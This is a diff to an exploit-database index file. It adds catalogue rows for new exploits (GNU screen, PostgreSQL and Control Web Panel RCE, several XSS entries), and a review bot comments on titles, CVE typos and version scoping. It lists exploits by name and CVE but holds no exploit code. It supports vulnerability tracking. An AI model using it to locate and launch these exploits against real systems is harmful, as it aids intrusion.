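Review bot: Row 51255 copies the `java` platform and the `exploits/java/webapps/` path from the older 44691 row, but ERPNext is, as far as I know, a Python application built on the Frappe framework, so both rows are filed under the wrong platform; since the path is fixed by this commit, the platform column should at least be confirmed before publishing rather than inherited from the sibling. The product is also spelled `ERPNext` here and `ERPnext` in 44691; one spelling should be used so a title search matches both entries.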
@@ -5418,6 +5423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35683,exploits/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",webapps,java,,2011-05-02,2015-01-03,1,,,,,,https://www.securityfocus.com/bid/47672/info
 47972,exploits/java/webapps/47972.txt,"Liferay CE Portal 6.0.2 - Remote Command Execution",2020-01-29,"Berk Dusunur",webapps,java,,2020-01-29,2020-01-29,0,,,,,,
 18881,exploits/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",webapps,java,,2012-05-15,2012-05-15,0,OSVDB-82028,,,,,
+51244,exploits/java/webapps/51244.py,"Liferay Portal 6.2.5 - Insecure Permissions",2023-04-05,Fu2x2000,webapps,java,,2023-04-05,2023-04-05,0,CVE-2021-33990,,,,,
 44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80,2018-06-26,2018-06-26,0,,"Cross-Site Request Forgery (CSRF)",,,,
 44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,,
 44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,,
@@ -6975,6 +6981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47703,exploits/linux/local/47703.txt,"GNU Mailutils 3.7 - Privilege Escalation",2019-11-21,"Mike Gualtieri",local,linux,,2019-11-21,2019-11-21,0,CVE-2019-18862,,,,,
 41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,,2017-01-25,2017-01-25,1,,,screenroot.sh,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-25-at-220348.png,http://www.exploit-db.comscreen-4.5.0.tar.gz,
 41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,,2017-01-25,2018-01-18,1,,,,,http://www.exploit-db.comscreen-4.5.0.tar.gz,https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
+51252,exploits/linux/local/51252.py,"GNU screen v4.9.0 - Privilege Escalation",2023-04-05,"Manuel Andreas",local,linux,,2023-04-05,2023-04-05,0,CVE-2023-24626,,,,,
 479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String",2004-09-25,n4rk0tix,local,linux,,2004-09-24,2016-03-30,1,OSVDB-10255,,,,http://www.exploit-db.comsharutils-4.2.1.tar.gz,
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20
 3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar,
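Review bot: Row 51252's description `GNU screen v4.9.0 - Privilege Escalation` departs from the two sibling rows (`GNU Screen 4.5.0 - Local Privilege Escalation`) in three ways: lower-case product name, a `v` prefix on the version, and the dropped `Local` qualifier even though the type column says `local`; `GNU Screen 4.9.0 - Local Privilege Escalation` lines up with them. CVE-2023-24626 is, as far as I recall, described upstream as a setuid-root screen letting a local user send SIGHUP to arbitrary PIDs, which is closer to a denial of service than an escalation, so the "Privilege Escalation" claim should be checked against what the PoC actually achieves before the row is published.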
@@ -9235,6 +9242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8842,exploits/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,dos,multiple,,2009-05-31,,1,OSVDB-55057;CVE-2009-1955,,,,,
 21575,exploits/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",dos,multiple,,2002-06-22,2016-09-08,1,CVE-2002-0653;OSVDB-842,,,,,https://www.securityfocus.com/bid/5084/info
 37487,exploits/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,dos,multiple,,2012-07-06,2015-07-04,1,CVE-2012-2138;OSVDB-83682,,,,,https://www.securityfocus.com/bid/54341/info
+51262,exploits/multiple/dos/51262.py,"Apache Tomcat 10.1 - Denial Of Service",2023-04-05,"Cristian Giustini",dos,multiple,,2023-04-05,2023-04-05,0,CVE-2022-29885,,,,,
 41668,exploits/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6192,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
 41670,exploits/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-03-22,0,CVE-2017-6191,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
 41669,exploits/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6193,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
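Review bot: Row 51262 capitalises the vulnerability class as `Denial Of Service` while the surrounding rows (8842, 37487) write `Denial of Service`, so a case-sensitive title search will not group it with them; `Apache Tomcat 10.1 - Denial of Service` is the form to use. The bare `10.1` version is also vaguer than the corpus norm — CVE-2022-29885 is, to my recollection, scoped to specific 10.1.0 milestone builds rather than the whole 10.1 line, so the row should name the build the PoC was tested against (or the affected range, as `PostgreSQL 9.3-11.7` in this file does).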
@@ -11169,6 +11177,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33653,exploits/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",remote,multiple,,2010-02-18,2014-06-06,1,CVE-2010-0703;OSVDB-62482,,,,,https://www.securityfocus.com/bid/38308/info
 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432,2019-05-08,2019-05-08,1,CVE-2019-9193,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
 50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",2022-03-30,b4keSn4ke,remote,multiple,,2022-03-30,2022-03-30,0,CVE-2019–9193,,,,,
+51247,exploits/multiple/remote/51247.py,"PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)",2023-04-05,"Paulo Trindade",remote,multiple,,2023-04-05,2023-04-05,0,CVE-2019–9193,,,,,
 23385,exploits/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",remote,multiple,,2003-11-17,2012-12-14,1,OSVDB-2824,,,,,https://www.securityfocus.com/bid/9055/info
 8037,exploits/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,remote,multiple,,2009-02-09,2016-10-27,1,OSVDB-51953;CVE-2009-0543;OSVDB-51849;CVE-2009-0542,,,,,
 32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,remote,multiple,,2009-02-10,2014-04-11,1,CVE-2009-0542;OSVDB-51953,,,,,https://www.securityfocus.com/bid/33722/info
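Review bot: The CVE field of the new row 51247 is `CVE-2019–9193` with an en dash (U+2013) between year and number instead of the ASCII hyphen that the Metasploit row 46813 two lines up spells correctly as `CVE-2019-9193`, so exact-match lookups (searchsploit's `--cve` filter, or a plain grep for the identifier) will miss this entry; the field should read `CVE-2019-9193`. The same glyph sits in the context row 50847, which is probably where it was copied from, and that row deserves the same fix in a follow-up. The port column is also empty where 46813 records 5432, and since this CVE is disputed by the PostgreSQL project as documented superuser behaviour of `COPY ... PROGRAM`, keeping the `(Authenticated)` qualifier in the title, as the row already does, is the right call.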
@@ -11544,6 +11553,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,,
 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-14946,,,,,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,,2020-06-24,2020-06-24,0,CVE-2020-14943,,,,,
+51254,exploits/multiple/webapps/51254.txt,"BTCPay Server v1.7.4 - HTML Injection.",2023-04-05,"Manojkumar J",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0493,,,,,
 31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",webapps,multiple,,2014-02-13,2014-02-13,0,CVE-2014-1219;OSVDB-103236,,,,,http://portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1219/
 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,,
 48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py
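Review bot: The description of row 51254, `BTCPay Server v1.7.4 - HTML Injection.`, ends with a period and prefixes the version with `v`, neither of which any neighbouring row does (`BSA Radar 1.6.7234.24750 - Local File Inclusion`, `Cabot 0.11.12 - Persistent Cross-Site Scripting`); `BTCPay Server 1.7.4 - HTML Injection` fits the corpus convention. The stray period is more than cosmetic because the title field is what searchsploit matches on, so an exact-title query would have to include it.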
@@ -11971,6 +11981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
 9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
 35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
+51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,,
 12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,,
 28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple,,2006-08-03,2017-10-17,1,CVE-2006-4068;OSVDB-29777,,,,,https://www.securityfocus.com/bid/19333/info
 47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,,2019-08-21,2019-08-21,0,CVE-2019-11510,,,,,
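Review bot: Row 51264's description `Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)` places the ` - ` separator after the first vulnerability instead of after the version, so it does not parse as the `Product Version - Vulnerability` pattern the rest of the file follows, and the `v.` version prefix appears in no sibling row. `Provide Server 14.4 - Cross-Site Scripting (XSS) / Cross-Site Request Forgery (CSRF) / Remote Code Execution (RCE)`, or simply `Provide Server 14.4 - Multiple Vulnerabilities` as rows like 35582 do, would keep it searchable by each class. Only one CVE is listed for three distinct issue classes, so it is worth confirming whether CVE-2023-23286 covers all of them or only the RCE.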
@@ -12006,6 +12017,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
+51237,exploits/multiple/webapps/51237.txt,"Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)",2023-04-05,"RedTeam Pentesting GmbH",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0214,,,,,
 41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784,2017-04-13,2017-04-13,0,,,,,,https://github.com/HackerFantastic/Public/blob/d1d3a421ba42ba476b0c23a3a09889a6cf1ee7a4/exploits/d3_decimator.txt
 49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
 34000,exploits/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,webapps,multiple,,2010-01-18,2014-07-08,1,,,,,,https://www.securityfocus.com/bid/40236/info
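Review bot: Row 51237 titles the product as a bare `Secure Web Gateway 10.2.11`, which is a generic product category rather than a name; every neighbouring row leads with the vendor (`SedSystems D3 Decimator`, `Selea CarPlateServer`), and without one this entry is unfindable by anyone searching for the affected vendor. CVE-2023-0214 is, to my recollection, assigned to the Skyhigh (formerly McAfee) Secure Web Gateway, in which case `Skyhigh Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)` is the form to use — confirm against the advisory before editing.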
@@ -12594,6 +12606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23311,exploits/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,dos,php,,2003-10-29,2012-12-11,1,CVE-2003-1191;OSVDB-2753,,,,,https://www.securityfocus.com/bid/8930/info
 6481,exploits/php/dos/6481.c,"Femitter FTP Server 1.03 - 'RETR' Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,dos,php,,2008-09-16,2017-04-20,1,CVE-2008-2032;OSVDB-44612,,,,http://www.exploit-db.comfem-dist.exe,
 1573,exploits/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,dos,php,,2006-03-09,,1,OSVDB-23846;CVE-2006-1224,,,,,
+51256,exploits/php/dos/51256.txt,"ImageMagick 7.1.0-49 - DoS",2023-04-05,nu11secur1ty,dos,php,,2023-04-05,2023-04-05,0,CVE-2022-44267,,,,,
 738,exploits/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,dos,php,,2005-01-03,,1,OSVDB-12800,,,,,
 10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,dos,php,80,2009-12-30,,1,,,,,http://www.exploit-db.comJoomla_1.5.15-Stable-Full_Package.zip,
 21428,exploits/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,dos,php,,2002-04-27,2012-09-21,1,OSVDB-86916,,,,,https://www.securityfocus.com/bid/4635/info
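Review bot: Row 51256 abbreviates the vulnerability class as `DoS` (`ImageMagick 7.1.0-49 - DoS`) while every other row in this section spells it out (`... - Denial of Service`), so a title search for "Denial of Service" will skip it; `ImageMagick 7.1.0-49 - Denial of Service` matches the convention. Filing a C image library under the `php` platform via `exploits/php/dos/` also looks like a classification shortcut; the path is already fixed by this commit, but the platform column should be confirmed against the PoC (the sibling 51261 row for CVE-2022-44268 makes the same choice, so at least the two are consistent with each other).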
@@ -14555,6 +14568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35309,exploits/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,webapps,php,,2011-02-02,2014-11-21,1,,,,,,https://www.securityfocus.com/bid/46124/info
 10189,exploits/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,webapps,php,,2009-11-20,,1,CVE-2009-4056;OSVDB-60467,,,,,
 23010,exploits/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8386/info
+51245,exploits/php/webapps/51245.txt,"bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 37073,exploits/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,webapps,php,,2012-04-11,2015-05-21,1,,,,,,https://www.securityfocus.com/bid/52983/info
 33649,exploits/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,webapps,php,,2010-02-16,2014-06-06,1,CVE-2010-0675;OSVDB-62363,,,,,https://www.securityfocus.com/bid/38264/info
 21157,exploits/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",webapps,php,,2001-11-19,2012-09-08,1,CVE-2001-0900;OSVDB-677,,,,,https://www.securityfocus.com/bid/3554/info
@@ -14985,6 +14999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69
 12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
+51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
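Review bot: Row 51242, `Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)`, carries no parameter or page qualifier, whereas the existing 50272 row for the same product and version is `Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)`; as written the new entry cannot be told apart from 50272 and may be a duplicate submission. If it is a different injection point, name it in the title the way the sibling rows do (`'adminname'`, `'Search'`, `'viewid'`); if it is the same one, the row should be dropped rather than indexed twice.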
@@ -15077,6 +15092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31858,exploits/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",webapps,php,,2008-05-28,2014-02-24,1,CVE-2008-2507;OSVDB-45673,,,,,https://www.securityfocus.com/bid/29411/info
 39173,exploits/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-05,1,CVE-2014-2934;OSVDB-106743,,,,,https://www.securityfocus.com/bid/67256/info
 39174,exploits/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-16,1,CVE-2014-2934;OSVDB-106741,,,,,https://www.securityfocus.com/bid/67256/info
+51241,exploits/php/webapps/51241.txt,"Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)",2023-04-05,"Mostafa Farzaneh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-2846,,,,,
 29606,exploits/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,webapps,php,,2007-02-15,2013-11-15,1,,,,,,https://www.securityfocus.com/bid/22578/info
 10758,exploits/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,webapps,php,,2009-12-27,,1,,,,,,
 27990,exploits/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",webapps,php,,2006-06-07,2013-09-01,1,CVE-2006-2973;OSVDB-26640,,,,,https://www.securityfocus.com/bid/18314/info
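Review bot: Row 51241 names the product as a bare `Calendar Event Multi View 1.4.07`; CVE-2022-2846 is, to my knowledge, assigned to the WordPress plugin of that name, and this corpus prefixes plugin entries with `WordPress Plugin` so they group together, in which case the title should start `WordPress Plugin Calendar Event Multi View 1.4.07 - ...` — confirm against the advisory before changing it. The authentication qualifier is also placed in running text (`Unauthenticated Arbitrary Event Creation to ...`) where other rows in this file put it as a parenthesised suffix (`SQL Injection (Unauthenticated)` in row 51246), so `... - Arbitrary Event Creation to Cross-Site Scripting (XSS) (Unauthenticated)` would be the consistent form.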
@@ -15448,6 +15464,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38322,exploits/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,webapps,php,,2013-02-19,2015-09-25,1,,,,,,https://www.securityfocus.com/bid/58045/info
 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
 24530,exploits/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,webapps,php,,2013-02-20,2013-02-20,0,OSVDB-90373;OSVDB-90372,,,,http://www.exploit-db.comckeditor_4.0.1_standard.zip,
+51260,exploits/php/webapps/51260.txt,"CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)",2023-04-05,"Manish Pathak",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-48110,,,,,
 4349,exploits/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,webapps,php,,2007-08-30,2016-11-30,1,OSVDB-38422;CVE-2007-4736,,,,,
 5678,exploits/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,webapps,php,,2008-05-26,2016-11-30,1,OSVDB-45654;CVE-2008-2774,,,,,
 11780,exploits/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php,,2010-03-16,,1,,,,,,
@@ -16006,6 +16023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",webapps,php,80,2016-09-13,2016-09-27,1,,,,,http://www.exploit-db.comcontrexx-opensource-1.0.zip,
 17682,exploits/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,webapps,php,,2011-08-17,2016-12-05,0,,,,,,
 17667,exploits/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,webapps,php,,2011-08-14,2011-08-15,1,,,,,,
+51250,exploits/php/webapps/51250.go,"Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)",2023-04-05,"Mayank Deshmukh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44877,,,,,
 27498,exploits/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24175,,,,,https://www.securityfocus.com/bid/17282/info
 27499,exploits/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24176,,,,,https://www.securityfocus.com/bid/17282/info
 27497,exploits/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24174,,,,,https://www.securityfocus.com/bid/17282/info
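Review bot: Row 51250 gives `v0.9.8.1147` as the affected version of Control Web Panel, but as far as I recall CVE-2022-44877 is described as affecting CWP 7 *before* 0.9.8.1147, i.e. that build is the fixed release, so the title names the patched version as the vulnerable one; it should say `< 0.9.8.1147` (the `Liferay Portal < 7.0.4` row in this file shows the form) after checking the PoC's tested-on line. The same CVE is, to my recollection, an unauthenticated login-handler injection, in which case the `(Unauthenticated)` suffix used by rows such as 50131 and 51246 belongs in the title, as it changes how the entry is triaged. The `v` prefix is also absent from every sibling row.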
@@ -18567,6 +18585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8900,exploits/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,webapps,php,,2009-06-07,,1,OSVDB-54927;CVE-2009-2013,,,,,
 50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",2021-11-08,"Martin Cernac",webapps,php,,2021-11-08,2021-11-08,0,CVE-2021-42325,,,,http://www.exploit-db.comfroxlor-0.10.29.1.tar.gz,
 16051,exploits/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,webapps,php,,2011-01-26,2011-01-26,0,,,,,,
+51263,exploits/php/webapps/51263.py,"Froxlor 2.0.3 Stable - Remote Code Execution (RCE)",2023-04-05,Askar,webapps,php,,2023-04-05,2023-04-05,0,CVE-2023-0315,,,,,
 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-11-17,0,,,,,,
 37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php,,2015-08-07,2015-08-07,0,OSVDB-125672,,,,http://www.exploit-db.comfroxlor-0.9.33.1.tar.gz,
 39931,exploits/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",webapps,php,80,2016-06-13,2016-06-13,1,,,,,,
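Review bot: Row 51263 omits the authentication qualifier that the neighbouring Froxlor row 50502 carries (`SQL Injection (Authenticated)`); CVE-2023-0315 is, as far as I recall, a command injection reachable only through the admin panel's settings, in which case the title should read `Froxlor 2.0.3 - Remote Code Execution (RCE) (Authenticated)` so the entry is not mistaken for a pre-auth RCE — confirm against the PoC's requirements before editing. The `Stable` suffix in the version field is also not something any sibling row uses and adds nothing the version number does not already say.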
@@ -19625,6 +19644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
